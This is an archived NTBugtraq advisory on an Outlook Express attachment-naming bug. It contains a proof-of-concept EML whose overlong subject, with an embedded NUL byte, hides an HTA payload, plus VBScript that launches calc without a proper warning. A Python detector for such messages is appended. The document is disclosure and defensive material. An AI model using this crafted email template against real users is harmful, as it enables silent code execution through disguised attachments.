Network Security NTBugtraq

Microsoft Windows - Filesystem bug allows various things

Subject: Microsoft Windows - Filesystem bug allows various things
Date: Fri, 3 Jun 2005 16:30:21 +0200

Description: A bug in Microsoft Windows can be exploited to create files which cannot be accessed by ("normal") programs and Windows itself. You cannot access (open, rename, delete, ...) such files. The file properties cannot be read or changed either. To create such files an attacker must send a specially formed email to a victim, and the victim must open an attachment (e.g. a text file - but I'm sure there is a way to create such files remotely without opening attachments).

The weakness can also be exploited by malicious people to trick users into
opening a malicious attachment:
Microsoft Outlook Express will open any executable attachment without
showing the correct warning message (for software) and the real type of the
file, if an email is specially formed and the OE option to block attachments
which could contain viruses is disabled (many users have disabled this). OE
will only show its normal (warning) message.


Proof-of-Concept exploit (save as EML file):

===>>> PoC - Start <<<===
From:"Benjamin Tobias Franz"<0-1-2-3@gmx.de>
To:You
Subject:MSOE - Attachment Download Security Restriction Bypass
Date:Wed, 1 Jun 2005
Content-Type:multipart/mixed;boundary="btf"

--btf
Content-Type: text/plain;

Open the attachment and you will see:
1. MS OE will not show the correct warning message (for software)
2. MS OE will not show any file type
3. MS OE will create a non-accessible file


Regards,

Benjamin Tobias Franz
Germany
--btf
Content-Type:message/rfc822
Content-Transfer-Encoding:quoted-printable

<!--
Subject:BTF's MSOE Attachment Download Security Restriction Bypass=
.hta=00.btfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtf=
btfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtf=
btfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtfbtf=
btfbtf
-->
<title>YOU ARE VULNERABLE</title>
<script language=3Dvbscript>set btf=3Dcreateobject("wscript.shell")
btf.run("calc")</script><body style=3D"background-color:red;font-si=
ze:40px;"><b>YOU ARE VULNERABLE (If you do not see this =
message in an email-message window)!!!</b><br><br><br>Regards,
<br><br>Benjamin Tobias Franz<br>Germany</body>
--btf--

===>>> PoC - End <<<===


Technical details: When Microsoft Outlook Express finds an attachment with content-type "message/rfc822" and no file name is specified, it will use the subject of the attached message as the file name. To exploit this the subject must contain more than 255 chars and end with: file extension + binary 0 + dot + anything. So the file will not be opened as an EML file, but the included file extension (before the binary 0) will be used to determine the program to open it with (but not to detect the file type). The created file will be saved in a subdirectory of the directory "Content.IE5" (you can open it by running "C:\Documents and Settings\*Your Username*\Local Settings\Temporary Internet Files\Content.IE5\"). You can find the file by searching in this directory (and its subdirectories) for files which include "BTF's MSOE Attachment Download Security Restriction Bypass" in their name. You will find a file displayed as a hidden system file, and you cannot access or delete it.

Affected software:
Microsoft Windows

Workaround:
-

Date of discovery:
01. June 2005

Tested software:
Fully patched system running Windows XP SP2.
Microsoft Outlook Express 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)

DLL versions:
MSOE.DLL: 6.00.2900.2527 (xpsp_sp2_gdr.040919-1056)
MSOERES.DLL: 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)



Regards,

Benjamin Tobias Franz
Germany

--
NTBugtraq Editor's Note:

Most viruses these days use spoofed email addresses. As such, using an 
Anti-Virus product which automatically notifies the perceived sender of a 
message it believes is infected may well cause more harm than good. Someone who 
did not actually send you a virus may receive the notification and scramble 
their support staff to find an infection which never existed in the first 
place. Suggest such notifications be disabled by whoever is responsible for 
your AV, or at least that the idea is considered.
--
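As an added defender-side example (not part of the original post or of the NTBugtraq archive), the check below parses an EML file and flags message/rfc822 attachments that match the conditions given in the technical details: no file name, an inner Subject longer than 255 bytes, or a file extension followed by a binary 0 and a dot. The sample message, its boundary name and the "Report.hta" subject are constructed for this example; the transfer encoding is undone on the raw bytes so a quoted-printable "=00" is seen as the NUL byte the mail client would get.

```python
"""Flag message/rfc822 attachments whose inner Subject would become the saved
file name: no filename given, Subject longer than 255 bytes, or a file extension
followed by a NUL byte and a dot. Added defender example, not the original post's code."""
import quopri
import re
from email import message_from_bytes

MAX_NAME = 255                                           # limit quoted in the advisory
NUL_EXT_RE = re.compile(rb"\.[A-Za-z0-9]{1,5}\x00\.")    # "<ext>" + binary 0 + "."
SUBJECT_RE = re.compile(rb"^Subject:[ \t]*(.*)$", re.MULTILINE | re.IGNORECASE)

def rfc822_attachment_findings(raw_eml: bytes) -> list:
    """Return (reason, subject_prefix) tuples for each suspicious rfc822 part."""
    boundary = message_from_bytes(raw_eml).get_boundary()
    if boundary is None:
        return []
    findings = []
    for chunk in re.split(rb"(?m)^--" + re.escape(boundary.encode()), raw_eml)[1:]:
        if chunk.startswith(b"--"):                      # closing "--boundary--"
            break
        chunk = chunk.lstrip(b"\r\n")
        part = message_from_bytes(chunk)                 # only its own headers matter
        if part.get_content_type() != "message/rfc822" or part.get_filename():
            continue                                     # named attachments are not affected
        # Undo quoted-printable ourselves on the raw inner bytes so "=00" becomes NUL.
        inner = re.split(rb"\r?\n\r?\n", chunk, maxsplit=1)[-1]
        cte = part.get("Content-Transfer-Encoding", "").strip().lower()
        if cte == "quoted-printable":
            inner = quopri.decodestring(inner)
        match = SUBJECT_RE.search(inner)
        if not match:
            continue
        subject = match.group(1).rstrip(b"\r")
        if len(subject) > MAX_NAME:
            findings.append(("subject longer than 255 bytes", subject[:32]))
        if NUL_EXT_RE.search(subject):
            findings.append(("extension + NUL + dot in subject", subject[:32]))
    return findings

# Constructed sample (not the advisory's PoC): a nameless rfc822 attachment whose
# Subject is "Report.hta" + NUL + "." padded past 255 bytes, sent quoted-printable.
LONG_SUBJECT = b"Report.hta\x00." + b"x" * 260
SAMPLE_EML = (
    b'Subject: sample\r\nContent-Type: multipart/mixed; boundary="bnd"\r\n\r\n'
    b"--bnd\r\nContent-Type: text/plain\r\n\r\nPlease open the attachment.\r\n"
    b"--bnd\r\nContent-Type: message/rfc822\r\n"
    b"Content-Transfer-Encoding: quoted-printable\r\n\r\n"
    b"Subject: " + quopri.encodestring(LONG_SUBJECT) + b"\r\n\r\n(inner body)\r\n--bnd--\r\n"
)
```

Running `rfc822_attachment_findings(SAMPLE_EML)` reports both conditions for the constructed attachment, while the same message with a `name="..."` parameter on the rfc822 part is not flagged.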
